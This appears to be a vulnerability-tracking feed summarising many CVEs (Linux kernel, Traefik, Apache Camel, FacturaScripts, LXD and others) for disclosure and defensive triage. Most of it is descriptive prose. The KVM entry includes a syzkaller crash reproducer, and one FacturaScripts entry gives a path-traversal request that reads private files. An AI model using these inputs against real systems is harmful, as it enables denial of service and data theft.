Null pointer dereference in Linux kernel bridge VLAN filtering code allows local authenticated attackers to trigger a denial of service via a crafted RTM_NEWLINK netlink message with BR_BOOLOPT_FDB_LOCAL_VLAN_0 flag when CONFIG_BRIDGE_VLAN_FILTERING is disabled. The vulnerability occurs because br_fdb_delete_locals_per_vlan_port() and br_fdb_insert_locals_per_vlan_port() dereference a NULL vlan group pointer without validation, causing a kernel panic. No public exploit code identified at time of analysis.

Canonical Denial Of Service Null Pointer Dereference Linux Red Hat +1
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43876 PHP MEDIUM PATCH GHSA This Month

Stored HTML injection in AVideo's notifySubscribers endpoint allows any authenticated uploader to broadcast platform-branded phishing emails to up to 10,000 channel subscribers without sanitization, escaping, or rate limits. The attacker-supplied HTML is injected directly into the email template via str_replace and rendered by PHPMailer, arriving with the platform's official contact email address, logo, and site title, enabling credential theft and reconnaissance at scale with no visible indication that content originated from an uploader rather than the platform operator.

Canonical XSS PHP CSRF
NVD GitHub
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-40453 Maven CRITICAL PATCH GHSA Act Now

The fix for CVE-2025-27636 added setLowerCase(true) to HttpHeaderFilterStrategy so that case-variant header names such as 'CAmelExecCommandExecutable' are filtered out alongside 'CamelExecCommandExecutable'. The same setLowerCase(true) call was not applied to five non-HTTP HeaderFilterStrategy implementations: JmsHeaderFilterStrategy and ClassicJmsHeaderFilterStrategy in camel-jms, SjmsHeaderFilterStrategy in camel-sjms, CoAPHeaderFilterStrategy in camel-coap, and GooglePubsubHeaderFilterStrategy in camel-google-pubsub. Because those strategies use case-sensitive String.startsWith('Camel'/'camel') filtering while the Camel Exchange stores headers in a case-insensitive map, an attacker with JMS (or equivalent) producer access to the broker consumed by a Camel route can inject case-variant Camel internal headers, which are then resolved by downstream components such as camel-exec and camel-file using their canonical casing. This enables remote code execution and arbitrary file write on routes that forward JMS messages to header-driven components. This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2.

Microsoft RCE Google Canonical Apache +1
NVD VulDB
CVSS 3.1
9.9
EPSS
0.1%
CVE-2026-39858 Go HIGH PATCH GHSA This Week

Authentication bypass in Traefik Proxy's ForwardAuth and snippet-based authentication middleware allows remote unauthenticated attackers to access protected routes by exploiting incomplete header sanitization. Traefik sanitizes canonical forwarded headers (X-Forwarded-Proto) but fails to strip underscore-based aliases (X_Forwarded_Proto). When authentication backends normalize these header variants equivalently, attackers can inject spoofed trust context through alias headers to satisfy authentication checks without valid credentials. Patches released for versions 2.11.43, 3.6.14, and 3.7.0-rc.2. No public exploit identified at time of analysis, though the detailed technical disclosure in the GitHub advisory provides sufficient implementation details for reproduction.

Authentication Bypass Canonical
NVD GitHub VulDB
CVSS 4.0
7.8
EPSS
0.0%
CVE-2026-31599 MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: media: vidtv: fix NULL pointer dereference in vidtv_channel_pmt_match_sections syzbot reported a general protection fault in vidtv_psi_desc_assign [1]. vidtv_psi_pmt_stream_init() can return NULL on memory allocation failure, but vidtv_channel_pmt_match_sections() does not check for this. When tail is NULL, the subsequent call to vidtv_psi_desc_assign(&tail->descriptor, desc) dereferences a NULL pointer offset, causing a general protection fault. Add a NULL check after vidtv_psi_pmt_stream_init(). On failure, clean up the already-allocated stream chain and return. [1] Oops: general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN PTI KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] RIP: 0010:vidtv_psi_desc_assign+0x24/0x90 drivers/media/test-drivers/vidtv/vidtv_psi.c:629 Call Trace: <TASK> vidtv_channel_pmt_match_sections drivers/media/test-drivers/vidtv/vidtv_channel.c:349 [inline] vidtv_channel_si_init+0x1445/0x1a50 drivers/media/test-drivers/vidtv/vidtv_channel.c:479 vidtv_mux_init+0x526/0xbe0 drivers/media/test-drivers/vidtv/vidtv_mux.c:519 vidtv_start_streaming drivers/media/test-drivers/vidtv/vidtv_bridge.c:194 [inline] vidtv_start_feed+0x33e/0x4d0 drivers/media/test-drivers/vidtv/vidtv_bridge.c:239

Canonical Null Pointer Dereference Linux Denial Of Service
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-31592 MEDIUM PATCH This Month

{2} has completed and can't rollack state). If KVM_SEV_INIT{2} fails, KVM can end up trying to add to a not-yet-initialized sev->regions_list, e.g. triggering a #GP Oops: general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN NOPTI KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] CPU: 110 UID: 0 PID: 72717 Comm: syz.15.11462 Tainted: G U W O 6.16.0-smp-DEV #1 NONE Tainted: [U]=USER, [W]=WARN, [O]=OOT_MODULE Hardware name: Google, Inc. Arcadia_IT_80/Arcadia_IT_80, BIOS 12.52.0-0 10/28/2024 RIP: 0010:sev_mem_enc_register_region+0x3f0/0x4f0 ../include/linux/list.h:83 Code: <41> 80 3c 04 00 74 08 4c 89 ff e8 f1 c7 a2 00 49 39 ed 0f 84 c6 00 RSP: 0018:ffff88838647fbb8 EFLAGS: 00010256 RAX: dffffc0000000000 RBX: 1ffff92015cf1e0b RCX: dffffc0000000000 RDX: 0000000000000000 RSI: 0000000000001000 RDI: ffff888367870000 RBP: ffffc900ae78f050 R08: ffffea000d9e0007 R09: 1ffffd4001b3c000 R10: dffffc0000000000 R11: fffff94001b3c001 R12: 0000000000000000 R13: ffff8982ab0bde00 R14: ffffc900ae78f058 R15: 0000000000000000 FS: 00007f34e9dc66c0(0000) GS:ffff89ee64d33000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fe180adef98 CR3: 000000047210e000 CR4: 0000000000350ef0 Call Trace: <TASK> kvm_arch_vm_ioctl+0xa72/0x1240 ../arch/x86/kvm/x86.c:7371 kvm_vm_ioctl+0x649/0x990 ../virt/kvm/kvm_main.c:5363 __se_sys_ioctl+0x101/0x170 ../fs/ioctl.c:51 do_syscall_x64 ../arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0x6f/0x1f0 ../arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x76/0x7e RIP: 0033:0x7f34e9f7e9a9 Code: <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f34e9dc6038 EFLAGS: 00000246 ORIG_RAX: 0000000000000010 RAX: ffffffffffffffda RBX: 00007f34ea1a6080 RCX: 00007f34e9f7e9a9 RDX: 0000200000000280 RSI: 000000008010aebb RDI: 0000000000000007 RBP: 00007f34ea000d69 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 00007f34ea1a6080 R15: 00007ffce77197a8 </TASK> with a syzlang reproducer that looks like: syz_kvm_add_vcpu$x86(0x0, &(0x7f0000000040)={0x0, &(0x7f0000000180)=ANY=[], 0x70}) (async) syz_kvm_add_vcpu$x86(0x0, &(0x7f0000000080)={0x0, &(0x7f0000000180)=ANY=[@ANYBLOB="..."], 0x4f}) (async) r0 = openat$kvm(0xffffffffffffff9c, &(0x7f0000000200), 0x0, 0x0) r1 = ioctl$KVM_CREATE_VM(r0, 0xae01, 0x0) r2 = openat$kvm(0xffffffffffffff9c, &(0x7f0000000240), 0x0, 0x0) r3 = ioctl$KVM_CREATE_VM(r2, 0xae01, 0x0) ioctl$KVM_SET_CLOCK(r3, 0xc008aeba, &(0x7f0000000040)={0x1, 0x8, 0x0, 0x5625e9b0}) (async) ioctl$KVM_SET_PIT2(r3, 0x8010aebb, &(0x7f0000000280)={[...], 0x5}) (async) ioctl$KVM_SET_PIT2(r1, 0x4070aea0, 0x0) (async) r4 = ioctl$KVM_CREATE_VM(0xffffffffffffffff, 0xae01, 0x0) openat$kvm(0xffffffffffffff9c, 0x0, 0x0, 0x0) (async) ioctl$KVM_SET_USER_MEMORY_REGION(r4, 0x4020ae46, &(0x7f0000000400)={0x0, 0x0, 0x0, 0x2000, &(0x7f0000001000/0x2000)=nil}) (async) r5 = ioctl$KVM_CREATE_VCPU(r4, 0xae41, 0x2) close(r0) (async) openat$kvm(0xffffffffffffff9c, &(0x7f0000000000), 0x8000, 0x0) (async) ioctl$KVM_SET_GUEST_DEBUG(r5, 0x4048ae9b, &(0x7f0000000300)={0x4376ea830d46549b, 0x0, [0x46, 0x0, 0x0, 0x0, 0x0, 0x1000]}) (async) ioctl$KVM_RUN(r5, 0xae80, 0x0) Opportunistically use guard() to avoid having to define a new error label and goto usage.

Linux Google Null Pointer Dereference Canonical Denial Of Service +2
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-31508 HIGH PATCH This Week

Use-after-free in Linux kernel Open vSwitch module causes system crash when deleting network interfaces on PREEMPT_RT kernels. The vulnerability is confirmed patched in multiple stable kernel versions (5.10.253, 5.15.203, 6.1.168, 6.6.131, 6.12.80, 6.18.21, 6.19.11, 7.0) with upstream fixes available via kernel.org commits. EPSS score of 0.02% (7th percentile) indicates very low exploitation likelihood. No active exploitation confirmed (not in CISA KEV). Local authenticated access required (CVSS AV:L/PR:L) with high impact (CVSS 7.8), but exploitation depends on PREEMPT_RT kernel configuration and specific Open vSwitch teardown race conditions.

Canonical Information Disclosure Linux Dell
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-6369 MEDIUM PATCH This Month

Canonical Livepatch snap client prior to 10.15.0 allows local unprivileged users to obtain a root-level authentication token via an unauthenticated request to the livepatchd.sock Unix domain socket, enabling attackers to impersonate the victim and access Livepatch services on systems with an active Ubuntu Pro subscription.

Authentication Bypass Ubuntu Canonical
NVD VulDB
CVSS 4.0
5.7
EPSS
0.0%
CVE-2026-40868 Go HIGH PATCH GHSA This Week

Kyverno's apiCall service helper automatically injects the controller's ServiceAccount token into HTTP requests when ClusterPolicy or GlobalContextEntry authors omit an Authorization header, enabling token exfiltration to attacker-controlled endpoints via confused deputy vulnerability. Affects deployments where policy YAML repositories are compromised (GitOps threat model) or ClusterPolicy creation is possible. CVSS 8.1 (High) reflects network attack vector with low complexity and low privileges required. No CISA KEV listing or public exploit identified at time of analysis, but GitHub advisory includes working proof-of-concept demonstrating token injection and exfiltration.

Code Injection Kubernetes Canonical
NVD GitHub VulDB
CVSS 3.1
8.1
EPSS
0.0%
CVE-2026-31424 MEDIUM PATCH This Month

NULL pointer dereference in the Linux kernel's netfilter x_tables subsystem allows a local attacker with CAP_NET_ADMIN privileges to crash the system by loading an NFPROTO_UNSPEC-registered xt_match or xt_target (e.g., xt_devgroup) into an ARP nftables chain via nft_compat, triggering a kernel panic and complete availability loss. CVSS 5.5 (AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H) accurately reflects the local-only, availability-only impact, and EPSS at 0.02% (7th percentile) indicates very low real-world exploitation probability. No active exploitation confirmed (not in CISA KEV); vendor-released patches are available across multiple stable kernel branches.

Linux Null Pointer Dereference Denial Of Service Canonical
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVSS 8.0
HIGH This Week

Stored CSV formula injection in FacturaScripts (all versions through 2026.1) lets an authenticated low-privilege user plant spreadsheet formula payloads in ordinary text fields (customer/supplier/product names, contacts) that execute when an administrator opens a routine list export. Because Core/Lib/Export/CSVExport.php::writeData() wraps values without neutralising leading =,+,-,@,tab, or carriage-return characters, and Tools::noHtml() only strips HTML metacharacters, the payload reaches the CSV verbatim and Excel/LibreOffice run it (including DDE process spawning) in the admin's OS context. A live PoC was verified on 2026-04-30, so publicly available exploit code exists, though there is no active exploitation confirmed (not in CISA KEV).

PHP CSRF Microsoft +2
NVD GitHub
CVSS 7.5
HIGH This Week

Unauthenticated arbitrary file read in FacturaScripts (all versions through v2026.2) lets remote attackers retrieve protected documents by abusing the static file controllers Files.php and Myfiles.php, which authorize requests on the raw URL prefix rather than the resolved filesystem path. A request such as /Plugins/../MyFiles/Private/invoice.pdf passes the prefix allow-list yet resolves to a private file, leaking customer/supplier invoices, attachments, and .sql database backups. A detailed, reproducible exploit is publicly available in the GitHub Security Advisory; there is no vendor-released patch identified at time of analysis and no evidence of active exploitation.

Apache PHP Canonical +2
NVD GitHub
CVSS 7.5
HIGH PATCH This Week

{appId}/{clusterName}/{namespace} endpoint as the literal string 'raw', so no matching secret is found and the signature check is skipped for the real target app. No public exploit identified at time of analysis; the flaw is fixed in Apollo 2.5.2.

Canonical Authentication Bypass
NVD GitHub
CVSS 7.5
HIGH PATCH This Week

Authentication bypass in Apollo (Ctrip apolloconfig) ConfigService allows an unauthenticated remote attacker to read protected configuration data from /configs and /configfiles endpoints even when AccessKey/management-key authentication is enabled. The flaw stems from ConfigService accepting a non-canonical appId variant (e.g. accented or trailing-space forms) that misses the AccessKey secret cache lookup - causing signature verification to be skipped - while the downstream release lookup still resolves the value to the real, protected app under equivalence-treating database collations. No public exploit identified at time of analysis, and it is not listed in CISA KEV; the confidentiality-only impact drives the CVSS 7.5 (High) rating.

Canonical Authentication Bypass
NVD GitHub
CVSS 7.2
HIGH POC PATCH This Week

Server-side request forgery in NukeViet CMS before 4.6.00 lets a remote unauthenticated attacker coerce the server into issuing outbound HTTP requests to an arbitrary host by spoofing the X-Forwarded-Host and X-Forwarded-Proto headers, which flow unvalidated into the cURL URL built by server_info_update(). Because the __serverInfoUpdate=1 POST handler in includes/ini.php runs before authentication, no credentials are needed. The flaw is blind, HEAD-only and uses a fixed request path, so its practical value is internal host/port discovery and poisoning of the cached server_headers rather than data exfiltration; no public exploit beyond the advisory PoC is identified and it is not in CISA KEV.

Canonical PHP SSRF
NVD GitHub
CVSS 7.8
HIGH POC PATCH This Week

Arbitrary Python code execution in BabelDOC (funstory-ai, pip package `babeldoc`) prior to 0.6.3 allows an attacker to run code in the context of the translation process by having a victim process a crafted PDF. The vendored pdfminer CMap loader (`cmapdb.py::_load_data`) strips only NUL bytes from a PDF-controlled CMap/Encoding name and passes it to `pickle.loads()`, so a hex-encoded absolute path in the PDF's `/Encoding` name redirects deserialization to an attacker-planted `.pickle.gz` file. A detailed, working proof-of-concept exists (publicly available exploit code exists); there is no CISA KEV listing and no public evidence of active exploitation at time of analysis.

Deserialization Python Canonical +6
NVD GitHub
HIGH POC PATCH This Week

Server-side request forgery (and cross-scheme local file disclosure) in the Ruby css_parser gem (all versions prior to 3.0.0) lets an attacker who can land a single @import url(...) rule in parsed CSS force the server to issue arbitrary HTTP/HTTPS GETs to any internal host, port or IP, and — via an attacker-controlled 302 redirect to a file:// URI — read local files. Premailer-style consumers that re-emit the parsed CSS into rendered HTML/email leak any CSS-shaped response bytes back to the attacker, turning this into a data-exfiltration channel rather than a blind SSRF. No public CVSS is published and it is not in CISA KEV, but a complete working proof-of-concept (poc.rb) is included in the advisory, so publicly available exploit code exists.

Kubernetes Hashicorp SSRF +7
NVD GitHub
CVSS 8.2
HIGH PATCH This Week

Stored cross-site scripting in the lxml_html_clean Cleaner (≤ 0.4.4) and the bundled lxml legacy html.clean module (≤ 6.1.0) lets attackers smuggle javascript: URLs through HTML sanitization on the namespaced xlink:href attribute. When callers configure Cleaner with safe_attrs_only=False, the URL-scheme scrubber never inspects <a xlink:href="javascript:..."> inside SVG or MathML, so the payload survives and executes when a victim clicks the rendered anchor. Publicly available exploit code exists (a working reproducer ships with the advisory), but there is no public exploit identified as being used in active attacks and the issue is not in CISA KEV.

XSS Python Canonical +1
NVD GitHub
CVSS 9.1
CRITICAL PATCH Act Now

Confidential-client impersonation in better-auth below 1.6.11 lets an attacker who holds any leaked refresh_token and the public client_id mint fresh access tokens and rotated refresh tokens indefinitely. The deprecated oidcProvider() and mcp() plugins expose an OAuth 2.0 token endpoint whose refresh_token grant authenticates solely on the bound refresh-token row plus a matching client_id, never verifying the registered client_secret - a regression, since the same plugins' authorization_code grant does enforce the secret. No public exploit identified at time of analysis; the flaw was reported by @subhanUmer and fixed by the maintainers, with no CISA KEV listing or EPSS score supplied in the input.

Authentication Bypass XSS Canonical
NVD GitHub
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Identity/authorization header spoofing in Traefik reverse proxy (before v2.11.51, v3.6.22, and v3.7.6) lets an attacker reaching a protected route smuggle an underscore-variant HTTP header past the BasicAuth, DigestAuth, and ForwardAuth middlewares' sanitization. Traefik strips canonical dashed spoofed headers before setting its own trusted value but ignores underscore forms (e.g. X_Forwarded_User vs X-Forwarded-User) that many backends normalize identically, so the forged header reaches the backend alongside — or, on the ForwardAuth authResponseHeaders path, instead of — Traefik's intended value. There is no public exploit identified at time of analysis and the issue is not in CISA KEV, but a vendor fix and upstream commit are published.

Code Injection Canonical Traefik
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Canonical URL spoofing in Gitea before 1.25.5 lets remote attackers inject malformed X-Forwarded-Proto values that the server trusts when computing its public-facing URL, causing it to emit attacker-controlled canonical links (e.g. in emails, redirects, and generated absolute URLs). No public exploit identified at time of analysis, and the low EPSS score (0.17%, 6th percentile) reflects minimal in-the-wild interest, but a vendor patch is available in v1.25.5. Note that the published CVSS vector claims availability impact (A:H) while the description describes URL spoofing (an integrity concern), a discrepancy worth verifying with the vendor.

Authentication Bypass Canonical Gitea +1
NVD GitHub
EPSS 0% CVSS 7.5
HIGH This Week

HTTP request smuggling in Ruby's WEBrick HTTP server through v1.9.2 allows remote attackers to desynchronize front-end/back-end request parsing by exploiting how WEBrick reparses a Content-Length value supplied in chunked trailers back into the canonical request state. Any deployment fronting WEBrick with a proxy, load balancer, or CDN that disagrees on message length can have requests smuggled past it, enabling request routing manipulation and information disclosure. Publicly available exploit code exists (SSVC exploitation status: poc), though EPSS remains low at 0.16% and it is not on CISA KEV.

Request Smuggling Canonical Information Disclosure
NVD GitHub VulDB
CVSS 7.5
HIGH PATCH This Week

Remote denial of service in the Zebra Zcash full-node (zebrad) up to and including v4.4.1 lets an unauthenticated peer deterministically crash any synced node running the standard Linux dual-stack configuration. By completing a P2P handshake over IPv4 to a `[::]` listener and then advertising a single invalid mempool transaction (e.g. a coinbase), the attacker triggers a reachable-assertion panic in the address book after a 30-second batch flush, and `panic = "abort"` terminates the process. No public exploit has been identified at time of analysis, but the advisory documents the full reproduction path; the crash is repeatable after every restart, enabling persistent downtime.

Canonical Denial Of Service
NVD GitHub
HIGH PATCH This Week

Remote denial-of-service in Zebra (zebrad ≤ v4.4.1), the Zcash Foundation's Rust node, lets an unauthenticated P2P peer permanently stall a targeted node at a chosen block height. By exploiting ZIP-244 transaction malleability, an attacker crafts a poisoned block body sharing the same header hash as a valid canonical block; Zebra caches the hash before validation and never evicts it on failure, so the legitimate block is later rejected as a duplicate. This is a real availability threat against default configurations, though there is no public exploit identified at time of analysis and it is not listed in CISA KEV; the flaw was independently reproduced end-to-end by two researchers.

Information Disclosure Canonical Checkpoint
NVD GitHub
HIGH POC PATCH This Week

Authentication bypass in the joserfc Python library (PyPI, versions <= 1.6.7) lets remote attackers forge valid HS256/HS384/HS512 JWTs whenever the application's verification secret resolves to an empty string or None. Because HMACAlgorithm.verify feeds the zero-length key straight into hmac.new(b'', ...) and OctKey.import_key only warns (never rejects) empty material, an attacker with no secret knowledge recomputes the identical HMAC digest and joserfc.jwt.decode accepts arbitrary forged claims (sub, admin, scopes, exp). A full working proof-of-concept is published in the advisory, though the flaw is gated on an operator-side misconfiguration (a secret sourced from an unset env var, missing DB/Redis row, or a '' fallback) rather than a default-config defect.

Authentication Bypass Python Canonical +1
NVD GitHub VulDB
CVSS 5.9
MEDIUM PATCH This Month

Path traversal in SFTPGo's public web-client partial ZIP download endpoint allows unauthenticated remote attackers to read files located outside a browsable share's directory boundary. The flaw exists because the endpoint validated file entries using a raw string prefix check rather than a directory-boundary-aware comparison - a crafted request can escape the share root by supplying paths whose canonical form begins with the shared directory name but resolves to a parent or sibling path. Affected versions prior to v2.7.3 are vulnerable; no public exploit or CISA KEV listing has been identified at time of analysis.

Canonical Path Traversal
NVD GitHub
EPSS 1% CVSS 8.7
HIGH POC PATCH This Week

Arbitrary file read in Langroid's SQLChatAgent (<= 0.63.0) lets an attacker who can influence the LLM-generated SQL exfiltrate files from the PostgreSQL host even under the strict default config (allow_dangerous_operations=False, allowed_statement_types=['SELECT']). The _validate_query blocklist enumerates dangerous functions by exact name and misses the pg_read_file/pg_stat_file/pg_ls_*/pg_current_logfile family (plus MSSQL OPENDATASOURCE and keyword-less SQLite ATTACH), so these SELECT-shaped payloads pass both the statement-type allowlist and the regex blocklist and reach the live SQLAlchemy engine. Publicly available exploit code exists (a working PoC ships in the GHSA advisory); no public exploit identified as actively exploited and this is not in CISA KEV.

PostgreSQL Python Path Traversal +2
NVD GitHub
MEDIUM PATCH This Month

Symlink traversal in oras-go's file content store allows writes outside the intended `workingDir` boundary even when `AllowPathTraversalOnWrite=false`. Applications that pull OCI artifacts from untrusted registries where an attacker controls blob titles (`ocispec.AnnotationTitle`) are at risk if any directory component under `workingDir` is a symlink pointing to an external path. No confirmed active exploitation (not in CISA KEV), but a self-contained proof-of-concept was included in the researcher's disclosure, making reproduction straightforward given the prerequisites.

Authentication Bypass Canonical
NVD GitHub
CVSS 7.5
HIGH PATCH This Week

Credential leakage in oras-go v2 (oras.land/oras-go) lets a malicious or compromised OCI registry steal a client's Authorization credentials by returning a cross-host Location header during monolithic blob upload; oras-go follows the redirect and reuses the original bearer/basic credentials on the PUT to the attacker-controlled host, also yielding client-side SSRF to an arbitrary cross-host target. Any Go application that pushes artifacts using oras-go v2.6.0 (and likely earlier v2.x) is affected. Rated CVSS 7.5 (High); no CISA KEV listing and no public exploitation, but the reporter includes a local proof-of-concept reproduction harness (poc.zip), and a fixed release (v2.6.1) is available.

SSRF Canonical
NVD GitHub
CVSS 8.2
HIGH PATCH This Week

Cross-tenant JWT authentication bypass in Centrifugo (v3 through v6) lets an attacker holding a valid token for one allowed issuer/tenant authenticate as a different issuer/tenant when the server uses dynamic JWKS endpoint templates. The flaw stems from the JWKS cache and singleflight lookup being keyed only by the JWT header 'kid', so a key fetched for tenant A is reused to verify a token claiming tenant B whenever both JWKS documents share the same 'kid' and tenant A's key is cached first. Publicly available exploit code exists in the form of a reporter-supplied Go unit-test PoC; there is no evidence of active exploitation, and the CVSS base score is 8.2 (AC:H, PR:L, scope-changed).

Authentication Bypass Jwt Attack Canonical
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM POC PATCH This Month

Timestamp forgery in sigstore-js allows an attacker supplying a crafted bundle v0.2 to manipulate certificate validity window checks by controlling the `integratedTime` field in an inclusionProof-only tlog entry. Because the inclusionProof-only code path in `@sigstore/verify` does not cryptographically bind `integratedTime` (unlike the signed inclusionPromise/set path), a low-privileged attacker who can present an untrusted bundle can cause the verifier to accept expired or not-yet-valid signing certificates as currently valid. A publicly available proof-of-concept exists; this vulnerability is not in CISA KEV.

Canonical Microsoft Information Disclosure
NVD GitHub
EPSS 0% CVSS 9.1
CRITICAL PATCH Act Now

Authentication and authorization bypass in @fastify/middie 9.1.0 through 9.3.2 lets remote unauthenticated attackers reach protected parameterized route handlers by placing an encoded slash (%2F) in a path parameter. The middleware layer decodes %2F before matching while Fastify's router preserves the encoding, so the two disagree on the canonical path and any middie-based auth, authz, rate-limiting, or auditing middleware silently fails to run while the route handler still fires. No public exploit identified at time of analysis; the flaw is method-agnostic and requires no special preconditions, and the vendor rates it CVSS 9.1.

Authentication Bypass Canonical Fastify Middie
NVD GitHub
EPSS 0% CVSS 5.5
MEDIUM PATCH This Month

Boot-time kernel crash in Linux 6.16+ on AMD IOMMU-equipped systems causes a General Protection Fault when a PCI device whose Bus:Device.Function address is absent from the ACPI IVRS table is encountered during IOMMU initialization. The root cause is a missing bounds check in __rlookup_amd_iommu() that was latent until commit e874c666b15b changed the rlookup_table allocation from a zeroed page-order block (which returned NULL on overrun) to a tight kvcalloc(), causing adjacent slab contents to be dereferenced as a valid struct amd_iommu pointer. The result is a non-recoverable GPF at boot time, confirmed in production on Google Compute Engine ct6e VMs; no public exploit code and no CISA KEV listing exist at time of analysis.

Google Linux Amd +3
NVD VulDB
CVSS 9.9
CRITICAL POC PATCH Act Now

Arbitrary host file write in Incus before 7.1.0 lets a holder of S3 bucket credentials escape the storage volume via a path-traversal-laden multipart upload ID and plant files anywhere the daemon (typically root) can write, escalating to remote code execution. The flaw lives in the local S3 storage backend's multipart upload handling, where the attacker-supplied uploadId is concatenated onto the uploads directory without sanitization. A complete working PoC exists that drops a /etc/cron.d job for root command execution; no CISA KEV listing or EPSS score is provided, so this is publicly available exploit code rather than confirmed active exploitation.

Path Traversal Canonical OpenSSL
NVD GitHub
EPSS 0% CVSS 5.0
MEDIUM PATCH This Month

Server-Side Request Forgery in Canonical LXD's image import endpoint allows authenticated users holding the can_create_images entitlement to direct the LXD daemon to make arbitrary outbound HTTP connections, including to loopback addresses, RFC1918 private ranges, and cloud instance metadata services such as 169.254.169.254. Affected versions span 4.12 through 6.9. An attacker can leverage error-based responses to enumerate internal TCP ports and fingerprint internal HTTP services from the daemon's privileged network position, enabling lateral reconnaissance in multi-tenant or cloud-hosted environments. No public exploit code has been identified at time of analysis, and CISA has not listed this in KEV.

SSRF Canonical Lxd
NVD GitHub VulDB
EPSS 0% CVSS 9.6
CRITICAL PATCH Act Now

Cross-guest storage-volume hijacking in Canonical LXD 6.6 through 6.8 lets an untrusted guest instance mount, read, and overwrite the custom storage volumes owned by other guests on the same host, breaking tenant isolation. Exploitation requires the non-default security.devlxd.management.volumes option to be enabled, and is fixed in LXD 6.9. Rated CVSS 9.6 with a scope change and CISA SSVC 'total' technical impact; SSVC lists exploitation as proof-of-concept, but EPSS is very low (0.11%, 1st percentile) and it is not in CISA KEV.

Authentication Bypass Canonical Lxd
NVD GitHub VulDB
EPSS 0% CVSS 2.3
LOW Monitor

wolfSSL's x86_64 Curve25519 scalar multiplication yields a non-canonical shared secret when carry propagation overflows into bit 255 during final modular reduction, producing a result in [p, 2^255) rather than the required canonical range [0, p). Both the x64 and AVX2 hand-written assembly paths in fe_x25519_asm.S are affected, and only specific edge-case scalar/point combinations trigger the flaw. wolfSSL self-reported this correctness defect and published a fix via GitHub PR #10536; no public exploit exists and the vulnerability is absent from CISA KEV.

Canonical Buffer Overflow Wolfssl
NVD GitHub
EPSS 0% CVSS 5.5
MEDIUM PATCH This Month

Null pointer dereference in the Linux kernel's IPv6 address configuration subsystem crashes the kernel when cleanup_prefix_route() receives the fib6_null_entry sentinel from addrconf_get_prefix_route() and attempts to access its NULL fib6_table pointer without validation. An authenticated local user holding CAP_NET_ADMIN can trigger this by sending a crafted IPv6 DELADDR netlink message, causing a general protection fault and system-wide denial of service. No public exploit or CISA KEV listing exists; EPSS is 0.17% (6th percentile), consistent with a privilege-gated local DoS affecting an extremely widely deployed target.

Linux Canonical Denial Of Service +1
NVD VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Remote denial of service in the Linux kernel's UDP receive path affects systems where a UDP socket is placed in a BPF sockmap with an attached SK_SKB verdict program. Because skb->dev is repurposed as dev_scratch on the UDP path and never cleared before the verdict program runs, a verdict program that calls a socket-lookup helper (bpf_sk_lookup_tcp/udp, bpf_skc_lookup_tcp) causes dev_net() to dereference a stale integer as a net_device pointer, triggering a general protection fault on a non-canonical address in softirq. There is no public exploit identified at time of analysis, EPSS is low (0.18%, 8th percentile), and the flaw is fixed; impact is availability only (kernel crash), not the 'Information Disclosure' the input tags suggest.

Linux Canonical Information Disclosure
NVD VulDB
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Local denial of service in the Linux kernel's Intel VT-d (iommu/vt-d) driver lets a privileged user crash the host by terminating a QEMU/VFIO guest, triggering a general-protection-fault oops. The flaw lives in domain_remove_dev_pasid(), which dereferences the global static blocked domain - a dummy iommu_domain with no backing dmar_domain - during PASID teardown on device reset. No public exploit is identified at time of analysis; EPSS is low (0.17%, 7th percentile) and it is not in CISA KEV.

Linux Canonical Information Disclosure +1
NVD VulDB
EPSS 0% CVSS 5.5
MEDIUM PATCH This Month

NULL pointer dereference in the Linux kernel SMC subsystem's smc_msg_event tracepoint crashes the kernel when SMC-D socket traffic is processed while the tracepoint is active. Affected kernels from commit aff3083f10bff7a37eaa2b4e6bc5fb627ddd5f84 across multiple stable branches dereference conn->lnk unconditionally in the tracepoint, though this pointer is only valid for SMC-R connections and is NULL for SMC-D. While activating the tracepoint requires root, the crash itself can be triggered by any unprivileged user via AF_SMC socket operations on SMC-D capable systems (s390 natively, or x86 with loopback ISM loaded). No public exploit or active exploitation confirmed; EPSS sits at 0.16%.

Linux Canonical Denial Of Service +1
NVD VulDB
EPSS 0% CVSS 5.5
MEDIUM PATCH This Month

NULL pointer dereference in the Linux kernel's BPF socket storage subsystem (net/core/bpf_sk_storage.c) allows a local low-privileged user to crash the kernel. The race condition between bpf_selem_unlink_nofail() - which nulls smap before removing the element from the hlist - and concurrent RCU readers in bpf_sk_storage_clone() and bpf_sk_storage_diag_put_all() can be triggered during TCP SYN handling (socket cloning path), producing a kernel panic. No public exploit identified at time of analysis; EPSS of 0.14% (4th percentile) confirms negligible observed exploitation probability.

Linux Canonical Denial Of Service +1
NVD VulDB
EPSS 1% CVSS 8.1
HIGH POC PATCH This Week

